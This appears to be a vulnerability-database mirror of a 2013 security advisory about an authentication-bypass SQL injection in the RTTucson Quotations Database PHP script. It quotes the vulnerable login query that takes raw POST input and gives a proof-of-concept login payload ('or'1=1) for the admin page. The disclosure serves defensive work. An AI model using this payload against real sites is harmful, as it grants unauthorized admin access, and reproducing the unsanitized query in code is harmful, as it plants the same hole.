Lucene search
K

RTTucson Quotations Database Authentication Bypass

🗓️ 21 Feb 2013 00:00:00Reported by cr4wl3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Tucson Quotations Database Authentication Bypass SQL Injection Vulnerabilit

Code
`# RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability  
# By cr4wl3r http://bastardlabs.info  
# Script: http://www.rttucson.com/files.html  
  
# Bugs found /quotations/admin/include/login.php  
---------------------------  
36 if ($_POST['submit']) {  
37  
38 $Username = $_POST['Username'];  
39 $Password = md5($_POST['Password']);  
40  
41 $query = "SELECT * from UsersTBL WHERE Username='$Username' AND Password='$Password'";  
42 $result = mysql_query($query) or die ( mysql_error() );  
---------------------------  
  
Proof of Concept  
  
http://bastardlabs/[path]/admin/include/login.php  
Username: 'or'1=1  
Password: cr4wl3r  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Feb 2013 00:00Current
0.8Low risk
Vulners AI Score0.8
20